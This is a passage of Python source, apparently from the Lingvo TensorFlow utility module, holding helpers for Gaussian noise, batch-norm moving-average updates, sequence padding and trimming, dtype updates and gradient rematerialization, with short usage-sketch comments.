seeds: A Tensor of shape [2]. 2 seeds for deterministic random number
generator.
noise_shape: A 1-D `Tensor` of type `int32`, representing the shape for
randomly generated Gaussian noise.
mean: Mean for the Gaussian noise.
std: Standard deviation for noise.
name: An optional name for this operation.
Returns:
A Tensor with the shape noise_shape and type fprop_dtype.
"""
with tf.name_scope(name, 'gaussian_noise') as name:
if use_tpu():
seeds = tf.cast(seeds, tf.int32)
random_tensor = mean + (
std * tf.random.stateless_normal(noise_shape, seed=seeds))
if FPropDtype(params) != tf.float32:
random_tensor = tf.cast(random_tensor, FPropDtype(params))
return random_tensor
BATCH_NORM_UPDATES = 'batch_norm_updates'
_BATCH_NORM_UPDATES_DICT = '__batch_norm_update_dict'
_get_batch_norm_updates_dict = _CollectionGetter(_BATCH_NORM_UPDATES_DICT,
lambda: {})
def UpdateBatchNormVars(batch_norm_var, batch_norm_stats, decay):
"""Update batch normalization moving averages."""
with tf.name_scope(
'AssignMovingAvg', values=[
batch_norm_var,
batch_norm_stats,
decay,
]) as scope:
with tf.ops.colocate_with(batch_norm_var):
decay = tf.convert_to_tensor(
1.0 - decay, dtype=batch_norm_var.dtype.base_dtype)
update_delta = (batch_norm_var - tf.cast(
batch_norm_stats, batch_norm_var.dtype.base_dtype)) * decay
has_nan_or_inf = tf.reduce_any(
tf.math.logical_or(
tf.math.is_nan(update_delta), tf.math.is_inf(update_delta)))
update_delta = tf.where(has_nan_or_inf, tf.zeros_like(update_delta),
update_delta)
bn_update = tf.assign_sub(batch_norm_var, update_delta, name=scope)
tf.add_to_collection(BATCH_NORM_UPDATES, bn_update)
if not tf.executing_eagerly_outside_functions():
bn_update_dict = _get_batch_norm_updates_dict()
if bn_update.name in bn_update_dict:
raise ValueError(f'BN update {bn_update.name} already exists.')
bn_update_dict[bn_update.name] = (batch_norm_var, batch_norm_stats)
return bn_update
def FindRelevantBatchNormUpdates(loss, batch_norm_updates):
"""Finds and returns a list of relevant batch-normalization updates.
Args:
loss: The loss that is being optimized for. A tensor or a list of tensors.
batch_norm_updates: A list of batch normalization updates.
Returns:
A pair of lists. The first list contains all the batch normalization updates
that are relevant to the loss being optimized, and the second list contains
all in batch_norm_updates but not in the first list.
"""
if tf.executing_eagerly():
return [], []
dependent_ops_and_tensors = set(FindNeeded(loss))
relevant_updates = []
irrelevant_updates = []
bn_update_dict = _get_batch_norm_updates_dict()
for bn_update in batch_norm_updates:
assert bn_update.name in bn_update_dict, (
'%s is probably not a valid batch normalization update op.'
' Make sure batch normalization is done through calling'
        ' the py_utils.UpdateBatchNormVars helper routine.' % bn_update.name)
bn_stat_name = bn_update_dict[bn_update.name][1].name
if bn_stat_name in dependent_ops_and_tensors:
# If a batch normalization stat is computed in the forward pass in
# computing loss, then the corresponding batch normalization update is
# relevant. Otherwise, it is not.
relevant_updates.append(bn_update)
else:
irrelevant_updates.append(bn_update)
return relevant_updates, irrelevant_updates
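# A minimal usage sketch that groups only the batch-norm moving-average updates the loss
# actually depends on with the training op; `loss` and `train_op` are hypothetical.
def _ExampleTrainOpWithBnUpdates(loss, train_op):
  bn_updates = tf.get_collection(BATCH_NORM_UPDATES)
  relevant, _ = FindRelevantBatchNormUpdates(loss, bn_updates)
  return tf.group(train_op, *relevant)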
_SAMPLE_STEP_STACK = ThreadLocalStack()
@contextlib.contextmanager
def SampleStep(step):
"""A context for a sample step during decoding.
Example usage::
with py_utils.SampleStep(step):
sample = self.DecodeOneStep()
Args:
step: the step tensor.
Yields:
a context manager for the step scope.
"""
try:
_SAMPLE_STEP_STACK.stack.append(step)
yield step
finally:
_SAMPLE_STEP_STACK.stack.pop()
def _GetSampleStep():
return _SAMPLE_STEP_STACK.stack[-1] if _SAMPLE_STEP_STACK.stack else None
def AddDebugTensor(tensor, summarize=None, name=None):
"""Adds `tensor` to the debug collection.
Prints the tensor if `--print_debug_tensors` is True.
Args:
tensor: A tensor.
summarize: Only print this many entries of each tensor. If None, then a
maximum of 3 elements are printed per input tensor.
name: An optional name for the tensor.
Returns:
A Tensor that evaluates to the same value as the input tensor.
"""
if _FromGlobal('print_debug_tensors'):
step = _GetSampleStep()
tensors_to_print = ([] if step is None else [step]) + [tensor]
with tf.name_scope(name) as s:
tensor = tf.Print(
tensor,
tensors_to_print,
message='DEBUG tensor %s' % s,
name=name,
summarize=summarize)
return tensor
def ArgMax(inputs):
"""tf.argmax wrapper.
Args:
inputs: A tensor, whose last dimension is being reduced on.
Returns:
A tensor of rank tf.rank(logits)-1. If i == ret[indices],
logits[indices, i] is the maximum among logits[indices, :].
"""
if use_tpu():
return tf.argmax(inputs, axis=-1, output_type=tf.int32)
else:
return tf.argmax(inputs, axis=-1)
def _EnsureMatrixShape(x):
if x.shape.ndims is None:
x.set_shape([None, None])
else:
assert x.shape.ndims == 2
return x
def Matmul(x, y, *args, **kwargs):
"""tf.matmul wrapper expecting x and y are actually matrices."""
x = _EnsureMatrixShape(x)
y = _EnsureMatrixShape(y)
return tf.matmul(x, y, *args, **kwargs)
def clip_by_value(t, clip_value_min, clip_value_max, name=None): # pylint: disable=invalid-name
if t.dtype.is_complex:
return tf.complex(
tf.clip_by_value(
tf.math.real(t), clip_value_min, clip_value_max, '%s_real' % name),
tf.clip_by_value(
tf.math.imag(t), clip_value_min, clip_value_max, '%s_imag' % name))
return tf.clip_by_value(t, clip_value_min, clip_value_max, name)
def _TransformAndSum(tensor_list, transform):
with tf.name_scope('TransformAndSum'):
sum_transform = []
for t in tensor_list:
with tf.device(t.device):
if isinstance(t, tf.IndexedSlices):
sum_transform += [tf.reduce_sum(transform(t.values))]
else:
sum_transform += [tf.reduce_sum(transform(t))]
return tf.add_n(sum_transform)
def SumSquared(tensor_list):
return _TransformAndSum(tensor_list, lambda v: v**2)
def SumAbs(tensor_list):
return _TransformAndSum(tensor_list, tf.abs)
def ReduceRms(x: tf.Tensor) -> tf.Tensor:
"""Computes root mean square of tensor x with numerical stability."""
if not x.shape.is_fully_defined():
raise ValueError('Shape of x must be fully defined.')
if not x.shape.as_list():
return x
denom = functools.reduce((lambda x, y: x * y), x.shape.as_list())
if denom <= 1e8:
return tf.math.sqrt(tf.math.reduce_mean(tf.math.square(x)))
tf.logging.info('reduce_rms %s denom=%d', x, denom)
sum_square_x = tf.math.reduce_sum(tf.math.reduce_sum(tf.math.square(x), -1))
avg_square_x = sum_square_x / tf.constant(denom, dtype=sum_square_x.dtype)
return tf.math.sqrt(avg_square_x)
def PiecewiseConstant(x_in, boundaries, values, vdtype):
"""Returns the piecewise value of x_in."""
x_in = tf.cast(tf.convert_to_tensor(x_in), tf.float32)
assert len(values) == len(boundaries) + 1
assert sorted(boundaries) == list(boundaries)
bs = tf.convert_to_tensor(boundaries, dtype=tf.float32)
vs = tf.convert_to_tensor(values, dtype=vdtype)
# The following is equivalent to 'return vs[index]'.
index = tf.reduce_sum(tf.cast(tf.greater_equal(x_in, bs), tf.int32))
one_hot_vec = tf.one_hot(
tf.expand_dims(index, 0), depth=len(values), dtype=vdtype)
return Matmul(tf.reshape(vs, (1, -1)), tf.transpose(one_hot_vec))[0][0]
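# A minimal usage sketch of PiecewiseConstant as a step-based learning-rate schedule;
# the boundaries and values below are hypothetical and assume a global step exists.
def _ExamplePiecewiseLearningRate():
  return PiecewiseConstant(
      GetGlobalStep(), boundaries=[10000, 20000],
      values=[1e-3, 5e-4, 1e-4], vdtype=tf.float32)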
def PadSequenceDimension(x, length, pad_val, shape=None, axis=1):
"""Pads x to `length` using `pad_val` along the axis dim.
Assumes `x` is a tensor with rank >= 2, and it only pads `x` to `length`
along the axis dim. Explicitly sets the returned tensor shape to `shape` if
given. Raises runtime errors if x.shape[axis] > length or
x.shape[i] != shape[i] where i != axis.
Args:
x: the tensor to be padded with axis dimension being the time. E.g., x
usually has shape [batch, seq_len, ...], when axis=1.
length: an int to specify the length to pad x to.
pad_val: an int or float used to pad x.
shape: an int array specifying the shape of the padded tensor if specified.
axis: The dimension that x will be padded, default to 1.
Returns:
The padded tensor with shape [batch, seq_len, ...], where
ret[:, :seq_len, ...] == x, when axis=1, and similarly for other axes.
"""
if x.shape.ndims is not None:
rank = x.shape.ndims
assert rank >= 2
slen = GetShape(x, rank)[axis]
pad_len = length - slen
pad = [[0, 0] for _ in range(rank)]
pad[axis][1] = pad_len
else:
rank = tf.rank(x)
with tf.control_dependencies([assert_greater_equal(rank, 2)]):
slen = tf.shape(x)[axis]
pad_len = length - slen
pad = tf.scatter_nd([[axis, 1]], [pad_len], [rank, 2])
x = tf.pad(x, pad, constant_values=pad_val)
if x.shape.ndims is not None and isinstance(length, int):
static_shape = x.shape.as_list()
static_shape[axis] = length
x.set_shape(static_shape)
if shape:
if not isinstance(shape, (list, tuple)):
raise TypeError('Shape must be a list or tuple.')
x = HasRank(x, len(shape))
x = tf.ensure_shape(x, shape)
return x
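# A minimal usage sketch (illustrative values):
#   x = tf.constant([[1, 2, 3], [4, 5, 6]])  # [batch=2, seq_len=3]
#   PadSequenceDimension(x, length=5, pad_val=0) gives:
#   [[1, 2, 3, 0, 0], [4, 5, 6, 0, 0]]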
def PadSequenceTo(xs, padding, length, pad_val):
"""Pads `xs` and `padding` to `length` using `pad_val` along the 2nd dim.
Pads `xs` to `length` using `pad_val`, and `padding` using 1.
Raise error if `x.shape[:2]` and `padding.shape` are not the same.
Args:
xs: A Tensor or a list of Tensors of shape [batch, seqlen] or [batch,
seqlen, ...].
padding: A 0/1 Tensor of shape [batch, seqlen]. 1 is for padded locations.
length: A Python int, the length to pad to.
pad_val: A Python numeric, used for padding x.
Returns:
A tuple of padded xs and padding.
"""
if not isinstance(xs, (list, tuple)):
new_xs = [xs]
else:
new_xs = xs
res = []
for x in new_xs:
batch, slen = GetShape(x, 2)
padding = HasRank(padding, 2)
padding = HasShape(padding, [batch, slen])
new_x = PadSequenceDimension(x, length, pad_val)
res.append(new_x)
padding = PadSequenceDimension(padding, length, tf.cast(1, padding.dtype))
if not isinstance(xs, (list, tuple)):
assert len(res) == 1
return res[0], padding
else:
return tuple(res), padding
def ApplyPadding(padding, x, padded=None, use_select=True):
"""Applies padding to a tensor.
This is preferable to using arithmetic means for masking out padded values
such as::
# Equiv to ApplyPadding(padding, x)
x *= 1.0 - padding
# Equiv to ApplyPadding(padding, new, old)
new = old * padding + new * (1 - padding)
Aside from just being easier to read and reason about, using this function
is friendly to quantized representations because it does not mix arithmetic
on the padding values with the values in the tensor being padded (which can
have a very different range than the 0..1 padding tensor).
In addition, this works around issues in quantized schemes where we are
guaranteed to have an exact 0 but not necessarily any other number (i.e. 1).
Args:
padding: Tensor of padding values where 0 == keep and 1 == pad.
x: Tensor to apply padding to.
padded: Optional. Values to include for padded elements. Defaults to zeros.
Must have a shape broadcastable to 'x' if specified.
use_select: Controls whether padding is applied with a select-mask
(True/default) or arithmetically (False). Some platforms have a
sensitivity to one or the other and this is used to work around such
issues.
Returns:
A tensor with the same shape as x with padded values masked.
"""
padding = with_dependencies([
Assert(
tf.reduce_all(
tf.math.logical_or(
tf.equal(padding, tf.zeros([], padding.dtype)),
tf.equal(padding, tf.ones([], padding.dtype)))), [padding])
], padding)
if use_select:
if padded is None:
padded = tf.zeros([], x.dtype)
if padding.dtype != tf.bool:
padding = padding > tf.zeros([], padding.dtype)
result = tf.where_v2(padding, padded, x)
return tf.ensure_shape(result, x.shape)
else:
result = x * tf.cast(1.0 - tf.cast(padding, tf.float32), x.dtype)
if padded is not None:
result += padded * tf.cast(padding, padded.dtype)
return result
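# A minimal usage sketch (illustrative values; padded positions are zeroed):
#   x = tf.constant([[1., 2., 3.], [4., 5., 6.]])
#   padding = tf.constant([[0., 0., 1.], [0., 1., 1.]])
#   ApplyPadding(padding, x) gives:
#   [[1., 2., 0.], [4., 0., 0.]]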
def LengthsFromPaddings(paddings):
"""Computes lengths of each sequence in a batch, ignoring trailing padding.
Note the following isn't guaranteed due to leading paddings.
PaddingsFromLengths(LengthsFromPaddings(x)) == x
Args:
paddings: a tensor with shape [batch, length].
Returns:
lengths tensor shaped [batch] containing the unpadded length of each
sequence in the batch.
"""
paddings = HasRank(paddings, 2)
paddings = tf.cast(paddings, tf.int32)
# Find the last unpadded value.
# Cannot just use tf.reduce_sum because there might be leading paddings.
# Everything after the last unpadded value has 1.0 - paddings == 0.0, so in
# the cumsum below they will have the same value.
cumsum = tf.cumsum(1 - paddings, axis=1)
same_as_last_element = tf.equal(cumsum, cumsum[:, -1:])
  # Counting the number of elements with the same value gives us num_padded + 1
  # and so counting the number that differs gives us the length - 1.
length = tf.reduce_sum(
1 - tf.cast(same_as_last_element, tf.int32), axis=1) + 1
# Special case for all 0 paddings.
all_zero_paddings = tf.equal(tf.reduce_sum(1 - paddings, axis=1), 0)
return tf.where(all_zero_paddings, tf.zeros_like(length), length)
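# A minimal usage sketch (illustrative values):
#   paddings = tf.constant([[0., 0., 1., 1.],
#                           [0., 0., 0., 0.]])
#   LengthsFromPaddings(paddings) gives: [2, 4]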
def PaddingsFromLengths(lengths, maxlen=None):
"""Computes paddings Tensor from lengths.
Note the following isn't guaranteed due to leading paddings.
PaddingsFromLengths(LengthsFromPaddings(x)) == x.
This method does not generate leading paddings.
Args:
lengths: A int32 Tensor of shape [B].
maxlen: None or a Python int or a scalar Tensor.
Returns:
A 0/1 valued Tensor of shape [B, maxlen or ?] where 1s are padded positions.
"""
lengths = HasRank(lengths, 1)
if maxlen is not None:
lengths = with_dependencies(
[assert_less_equal(tf.cast(tf.reduce_max(lengths), tf.int32), maxlen)],
lengths)
return 1. - tf.sequence_mask(lengths, maxlen=maxlen, dtype=tf.float32)
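# A minimal usage sketch (illustrative values):
#   PaddingsFromLengths(tf.constant([2, 4]), maxlen=5) gives:
#   [[0., 0., 1., 1., 1.],
#    [0., 0., 0., 0., 1.]]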
def TrimTrailingPaddings(inputs, paddings):
"""Trims trailing paddings from inputs.
Since the number of dimensions is not fixed, this will not work on TPU.
Args:
inputs: a tensor with shape [batch, length, ...].
paddings: a tensor with shape [batch, length].
Returns:
Trimmed inputs and paddings. For compatibility reasons, the trimmed tensors
will always have length at least 1.
"""
paddings = HasRank(paddings, 2)
max_length = tf.maximum(tf.reduce_max(LengthsFromPaddings(paddings)), 1)
output_shape = tf.shape(inputs)
output_shape = tf.concat([[output_shape[0], max_length], output_shape[2:]],
axis=0)
outputs = tf.slice(inputs, tf.zeros_like(output_shape), output_shape)
out_paddings = tf.slice(paddings, [0, 0],
tf.stack([output_shape[0], max_length]))
return outputs, out_paddings
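# A minimal usage sketch (illustrative values):
#   inputs = tf.constant([[1, 2, 0, 0], [3, 4, 5, 0]])
#   paddings = tf.constant([[0., 0., 1., 1.], [0., 0., 0., 1.]])
#   TrimTrailingPaddings(inputs, paddings) gives:
#   [[1, 2, 0], [3, 4, 5]] and [[0., 0., 1.], [0., 0., 0.]]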
def ReversePaddedSequence(inputs, paddings):
"""Reverse inputs based on paddings.
Only reverse the unpadded portion of `inputs`. It assumes inputs are only
padded in the end.
Args:
inputs: a tensor of [seq_length, batch_size, num_input_nodes].
paddings: a tensor of float32/float64 zero or one of shape [seq_length,
batch_size, 1].
Returns:
A reversed tensor of the same shape as `inputs`.
"""
inversed_paddings = 1.0 - tf.squeeze(paddings, 2)
inputs_length = tf.cast(
tf.math.rint(tf.reduce_sum(inversed_paddings, axis=0)), tf.int32)
return tf.reverse_sequence(inputs, inputs_length, seq_axis=0, batch_axis=1)
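# A minimal usage sketch (illustrative values; time-major layout):
#   inputs = tf.constant([[[1.]], [[2.]], [[3.]]])    # [seq_length=3, batch=1, 1]
#   paddings = tf.constant([[[0.]], [[0.]], [[1.]]])  # last step is padding
#   ReversePaddedSequence(inputs, paddings) gives:
#   [[[2.]], [[1.]], [[3.]]]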
def ConcatenatePaddedSequences(input0, input1, padding0, padding1, seq_dim=1):
"""Concatenates input sequences with varying lengths as defined by paddings.
This is a helper function for concatenating 2 batches of input sequences,
where each example in the batch can have different lengths, as defined by
the corresponding paddings. To concatenate correctly, it makes use of
tf.reverse_sequence to partially reverse the sequences before
concatenating them together.
NOTE: We assume that the tensors have no leading paddings.
Args:
input0: A tensor of size [batch, max_length, ...] or [max_length, batch,
...] depending on the value set for axis.
input1: A tensor of size [batch, max_length, ...] or [max_length, batch,
...] depending on the value set for axis.
padding0: A Tensor of size [batch, max_length] or [max_length, batch]
corresponding to the padding for input0.
padding1: A Tensor of size [batch, max_length] or [max_length, batch]
corresponding to the padding for input1.
seq_dim: int, the time axis along which the tensors will be concatenated.
Should be 0 or 1. Assumes that batch_dim is 1 - seq_dim.
Returns:
The concatenation of input0 and input1, and the corresponding padding.
Raises:
tf.errors.InvalidArgumentError when seq_dim is not 0 or 1.
"""
if seq_dim != 0 and seq_dim != 1:
raise tf.errors.InvalidArgumentError(None, None, 'seq_dim must be 0 or 1.')
batch_dim = 1 - seq_dim
  # input0 and input1 should have the same batch size and the same rank.
input0 = with_dependencies([
assert_equal(GetShape(input0)[batch_dim],
GetShape(input1)[batch_dim]),
assert_equal(GetRank(input0), GetRank(input1))
], input0)
batch_size = GetShape(padding0)[batch_dim]
# batch dimension of inputs and paddings should match.
input0 = with_dependencies([
assert_equal(GetShape(input0)[batch_dim], batch_size),
assert_equal(GetShape(padding1)[batch_dim], batch_size)
], input0)
input0_seq_dim = tf.cast(
tf.tile([tf.shape(padding0)[seq_dim]], [batch_size]), dtype=tf.int32)
input1_seq_dim = tf.cast(
tf.tile([tf.shape(padding1)[seq_dim]], [batch_size]), dtype=tf.int32)
# LengthsFromPaddings assumes that paddings is of size [batch, max_length].
if seq_dim == 1:
seq_length0 = LengthsFromPaddings(padding0)
seq_length1 = LengthsFromPaddings(padding1)
else:
seq_length0 = LengthsFromPaddings(tf.transpose(padding0))
seq_length1 = LengthsFromPaddings(tf.transpose(padding1))
# We assume that the tensors have no leading paddings.
# TODO(arunnt): Concatenate tensors with leading paddings correctly.
seq_length0 = with_dependencies([
assert_equal(
seq_length0,
tf.cast(tf.reduce_sum(1.0 - padding0, seq_dim), dtype=tf.int32))
], seq_length0)
seq_length1 = with_dependencies([
assert_equal(
seq_length1,
tf.cast(tf.reduce_sum(1.0 - padding1, seq_dim), dtype=tf.int32))
], seq_length1)
# Concatenate input sequences.
reversed_input0 = tf.reverse_sequence(
input0, seq_length0, seq_axis=seq_dim, batch_axis=batch_dim)
reversed_input1 = tf.reverse_sequence(
input1, input1_seq_dim, seq_axis=seq_dim, batch_axis=batch_dim)
reversed_concat = tf.concat([reversed_input1, reversed_input0], axis=seq_dim)
concat_inputs = tf.reverse_sequence(
reversed_concat,
seq_length0 + input1_seq_dim,
seq_axis=seq_dim,
batch_axis=batch_dim)
# Concatenate paddings. Note that paddings are always a Tensor of 0s and 1s,
# so, unlike the inputs, we don't have to reverse padding1, we can simply
# concatenate reversed padding0 and padding1.
reversed_padding0 = tf.reverse_sequence(
padding0, input0_seq_dim, seq_axis=seq_dim, batch_axis=batch_dim)
reversed_concat_padding = tf.concat([reversed_padding0, padding1],
axis=seq_dim)
concat_paddings = tf.reverse_sequence(
reversed_concat_padding,
input0_seq_dim + seq_length1,
seq_axis=seq_dim,
batch_axis=batch_dim)
return concat_inputs, concat_paddings
def ShiftLeft(tensor, shift_size, pad_val=0, axis=1):
"""Shifts the values in a tensor to the left along the axis dimension.
The first shift_size values are dropped, and the tensor is padded on the
right with pad_val.
Args:
tensor: the input tensor with the axis dim being time.
shift_size: the number of frames >= 0 to shift.
pad_val: the value to pad on the right of the tensor.
axis: The dimension along which the tensor will be shifted, default to 1.
Returns:
A left shifted tensor on dimension axis.
"""
rank = tensor.shape.rank
with tf.control_dependencies(
[assert_greater_equal(rank, 2),
assert_greater_equal(shift_size, 0)]):
time = GetShape(tensor)[axis]
begin = tf.scatter_nd([[axis]], [shift_size], [rank])
return PadSequenceDimension(
tf.slice(tensor, begin, size=[-1] * rank), time, pad_val, axis=axis)
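# A minimal usage sketch (illustrative values):
#   x = tf.constant([[1, 2, 3, 4]])
#   ShiftLeft(x, shift_size=2, pad_val=0) gives: [[3, 4, 0, 0]]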
def Retry(*args, **kwargs):
return retry.Retry(*args, **kwargs)
# FailedPreconditionError: variables are not initialized.
# AbortedError: processes restarts.
# UnavailableError: Bad hardware status: 0x1
transient_tf_errors = (tf.errors.FailedPreconditionError,
tf.errors.AbortedError, tf.errors.UnavailableError)
def RetryOnTransientTfError(*args, **kwargs):
return Retry(transient_tf_errors, *args, **kwargs)
def PadOrTrimTo(x, shape, pad_val=0, pad_after_contents=True):
"""Pad and slice x to the given shape.
Args:
x: A tensor.
shape: The shape of the returned tensor.
pad_val: An int or float used to pad x.
pad_after_contents: Whether to pad and trim after the original contents of
each dimension.
Returns:
'x' is padded with pad_val and sliced so that the result has the given
shape.
Raises:
ValueError: if shape is a tf.TensorShape and not fully defined.
"""
if isinstance(shape, (list, tuple)):
expected_rank = len(shape)
elif isinstance(shape, tf.TensorShape):
if not shape.is_fully_defined():
raise ValueError('shape %s padding %s must be fully defined.' %
(shape, x))
expected_rank = shape.rank
else:
shape = HasRank(shape, 1)
expected_rank = tf.size(shape)
x = HasRank(x, expected_rank)
pad = shape - tf.minimum(tf.shape(x), shape)
zeros = tf.zeros_like(pad)
if pad_after_contents:
# If dim_i is less than shape[i], pads after contents.
paddings = tf.stack([zeros, pad], axis=1)
# If dim_i is larger than shape[i], we slice [0:shape[i]] for dim_i.
slice_begin = zeros
else:
# If dim_i is less than shape[i], pads before contents.
paddings = tf.stack([pad, zeros], axis=1)
# If dim-i is larger than shape[i], we slice [dim_i - shape[i]:dim_i]
# for dim_i.
slice_begin = tf.shape(x) + pad - shape
x = tf.pad(x, paddings, constant_values=pad_val)
x = tf.slice(x, slice_begin, shape)
return tf.reshape(x, shape)
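# A minimal usage sketch (illustrative values): trims the first dim and pads
# the second dim.
#   x = tf.ones([3, 2])
#   PadOrTrimTo(x, [2, 4], pad_val=0) gives a [2, 4] tensor:
#   [[1., 1., 0., 0.], [1., 1., 0., 0.]]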
def RepeatDim(tensor, multiple, axis):
"""Copies elements in tensor's axis "multiple" times, like np.repeat."""
# x = [[1, 2, 3], [4, 5, 6]]
# RepeatDim(x, multiple=2, axis=1) gives:
  # [[1, 1, 2, 2, 3, 3], [4, 4, 5, 5, 6, 6]]
  # As a comparison tf.tile(x, multiples=[1, 2]) gives:
# [[1, 2, 3, 1, 2, 3], [4, 5, 6, 4, 5, 6]]
if multiple == 1:
return tensor
t_shape = tf.shape(tensor)
tensor_dims = tf.concat(
[t_shape[:axis], [t_shape[axis] * multiple], t_shape[axis + 1:]], 0)
multiple_dims = tf.concat([
tf.fill([axis + 1], 1), [multiple],
tf.fill([tf.rank(tensor) - axis - 1], 1)
], 0)
return tf.reshape(
tf.tile(tf.expand_dims(tensor, axis + 1), multiple_dims), tensor_dims)
def StackTensorsRecursively(values):
"""Recursively stacks Tensors in a list of `.NestedMap`.
Args:
values: a list of `.NestedMap` or Tensors to stacks.
Returns:
A `.NestedMap` with stacked values or a stacked Tensor.
"""
flatten = [w.Flatten() for w in values]
stacked = []
for i in range(len(flatten[0])):
stacked += [tf.stack([flatten[j][i] for j in range(len(flatten))])]
ret = values[0].Pack(stacked)
return ret
def MixByWeight(inputs, weights, seed=None):
"""Returns a weighted random choice and bprop type from the give inputs.
Args:
inputs: a list of callables, where each callable returns a tf.Tensor or a
nested structure containing tf.Tensor. Function return types must be
consistent across elements. The tf.Operation to compute the result tensor
will only be invoked for one input at a time. For example, if each fn
represents an input record stream, a record will be drawn only from a
selected stream while the other streams will remain unchanged.
weights: a 1D tensor of float > 0 of the same length as inputs.
seed: random seed.
Returns:
A probabilistic sample from the inputs proportional to the weights. The
return type will be the same as return type of individual 'fn' from the
inputs.
A one-hot vector of the source selected.
"""
weights = tf.convert_to_tensor(weights, dtype=tf.float32)
weights = with_dependencies([
assert_equal(tf.shape(weights), [len(inputs)]),
assert_greater_equal(tf.reduce_min(weights), 0.0)
], weights)
lower = tf.cumsum(weights, exclusive=True)
upper = tf.cumsum(weights, exclusive=False)
r = tf.random.uniform(shape=[], maxval=upper[-1], seed=seed)
return_input = tf.case(
[(tf.math.logical_and(lower[i] <= r, r < upper[i]), inputs[i])
for i in range(len(inputs))],
exclusive=True)
selected_index = tf.case(
[(tf.math.logical_and(lower[i] <= r, r < upper[i]), lambda i=i: i)
for i in range(len(inputs))],
exclusive=True)
bprop_index = tf.one_hot(selected_index, len(inputs), dtype=tf.float32)
return return_input, bprop_index
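# A minimal usage sketch (DatasetA/DatasetB are assumed callables that each
# return a batch of tensors when invoked):
#   batch, source_one_hot = MixByWeight([DatasetA, DatasetB],
#                                       weights=[0.8, 0.2])
#   # A batch is drawn from DatasetA with probability 0.8, DatasetB with 0.2.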
def CheckShapes(shapes):
"""Asserts that shapes is a tuple of NestedMap or tshape.Shape."""
assert isinstance(shapes, tuple), str(shapes)
for s in shapes:
if isinstance(s, NestedMap):
assert all([isinstance(t, tshape.Shape) for t in Flatten(s)
]), '{} contains non-tensor value.'.format(s)
else:
assert isinstance(s, tshape.Shape), '{}: {}'.format(type(s), s)
def FPropDtype(params):
return params.fprop_dtype if params.fprop_dtype is not None else params.dtype
def UpdateFpropDtype(params, fprop_dtype):
"""Recursively update the fprop_dtype of the Params."""
# Handle the case when the input "params" is not an instance of hyperparams
# For example, when UpdateDtype is called recursively for all the items in
# the "sub" list of SequentialLayer (see 1st elif below)
if not isinstance(params, hyperparams.Params):
return
for key, val in params.IterParams():
if isinstance(val, hyperparams.Params):
UpdateFpropDtype(val, fprop_dtype)
elif isinstance(val, (list, tuple)):
for item in val:
UpdateFpropDtype(item, fprop_dtype)
elif key == 'fprop_dtype':
params.fprop_dtype = fprop_dtype
def UpdateDtype(params, dtype):
"""Recursively update the dtype of the Params."""
# Handle the case when the input "params" is not an instance of hyperparams
# For example, when UpdateDtype is called recursively for all the items in
# the "sub" list of SequentialLayer (see 1st elif below)
if not isinstance(params, hyperparams.Params):
return
for key, val in params.IterParams():
if isinstance(val, hyperparams.Params):
UpdateDtype(val, dtype)
elif isinstance(val, (list, tuple)):
for item in val:
UpdateDtype(item, dtype)
elif key == 'dtype':
params.dtype = dtype
def NameScopeDecorator(name_scope):
"""Decorates a python function to introduce a tf.name_scope.
Example::
@py_utils.NameScopeDecorator('foobar')
def MyFoobarMethod(self):
# ... Do TF things
Args:
name_scope: The name scope to introduce.
Returns:
A function decorator.
"""
def Decorator(f):
def Wrapped(*args, **kwargs):
with tf.name_scope(name_scope):
return f(*args, **kwargs)
return Wrapped
return Decorator
def SequencesToDebugStrings(ids, lens, summarize=5):
"""Returns debug strings for the given sequences.
Args:
ids: int32 of [batch, len].
lens: int32 of [batch].
summarize: number of ids to summarize per sequence.
Returns:
A string tensor of [batch].
"""
num_seqs = tf.shape(lens)[0]
def _Body(i, result):
line = tf.strings.format('{}', ids[i, :lens[i]], summarize=summarize)
return i + 1, tf.concat([result, tf.reshape(line, [1])], axis=0)
i0 = tf.zeros(shape=[], dtype=tf.int32)
result0 = tf.constant('', shape=[0], dtype=tf.string)
_, strs = tf.while_loop(
lambda i, result: i < num_seqs,
_Body, (i0, result0),
shape_invariants=(i0.shape, tf.TensorShape([None])))
return strs
# TODO(jamesqin): follow suggestions in
# b/167460492#comment16
def RematerializeFn(fn, *xs):
"""Calls fn and rematerializes fn in the backward pass.
`fn(*xs) -> ys`, where xs and ys can be a single tensor or a tuple of tensors.
Args:
fn: A python function to be rematerialized in the backprop pass.
*xs: A single tensor or a list/tuple of tensors. `xs` are input args to the
fn function.
Returns:
`fn(*xs)`
"""
initial_step_seed = GetStepSeed()
final_step_seed = MaybeGenerateSeedFromScope()
def Backward(fwd_xs, fwd_ys, d_fwd_ys):
"""The backward function that rematerializes forward outputs."""
del fwd_ys
always_true = tf.random.uniform([]) < 2.0
# Alternatively, can do this:
# tf.where(tf.math.is_nan(x),
# tf.constant(float('nan'), dtype=x.dtype) * tf.ones_like(x),
# x)
bak_xs = [tf.where(always_true, x, tf.zeros_like(x)) for x in fwd_xs.xs]
for dst, src in zip(bak_xs, xs):
dst.set_shape(src.shape)
ResetStepSeed(initial_step_seed)
ys = fn(*bak_xs)
MaybeResetStepSeed(final_step_seed)
dxs = tf.gradients(ys, bak_xs, grad_ys=d_fwd_ys)
dxs_final = []
for dx, x in zip(dxs, bak_xs):
if dx is None:
dxs_final.append(tf.zeros_like(x))
else:
dxs_final.append(dx)
assert len(dxs_final) == len(bak_xs)
return NestedMap(
initial_step_seed=tf.zeros_like(initial_step_seed), xs=dxs_final)
ys_shapes = []
# TODO(huangyp, yonghui): Check Forward doesn't use any stateful random ops.
def Forward(fwd_xs):
"""Forward function plus sanity checks."""
for dst, src in zip(fwd_xs.xs, xs):
dst.set_shape(src.shape)
ResetStepSeed(fwd_xs.initial_step_seed)
ys = fn(*fwd_xs.xs)
# Some sanity check.
assert not GetExtraInputs()
assert not GetExtraArgs()
assert not GetExtraVars()
if isinstance(ys, tuple):
for y in ys:
assert isinstance(y, tf.Tensor)
ys_shapes.append(y.shape)
else:
assert isinstance(ys, tf.Tensor)
ys_shapes.append(ys.shape)
return ys
ys = CallDefun(
Forward,
NestedMap(initial_step_seed=initial_step_seed, xs=xs),
bak=Backward)
if isinstance(ys, tuple):
for y, s in zip(ys, ys_shapes):
y.set_shape(s)
else:
ys.set_shape(ys_shapes[0])
# TODO(b/129159299): The ResetStepSeed below is needed to work around this
# bug, which is a problem with global tensors being shared by different
# inference graphs. It should be replaced with the new step seed value
# returned from the Forward function when the bug is fixed.
MaybeResetStepSeed(final_step_seed)
return ys
# A set of names of stateful random number generator ops.
# See tensorflow/core/ops/random_ops.cc
_STATEFUL_RANDOM_OPS = frozenset({
# pyformat: disable
'RandomUniform',
'RandomUniformInt',
'RandomStandardNormal',
'ParameterizedTruncatedNormal',
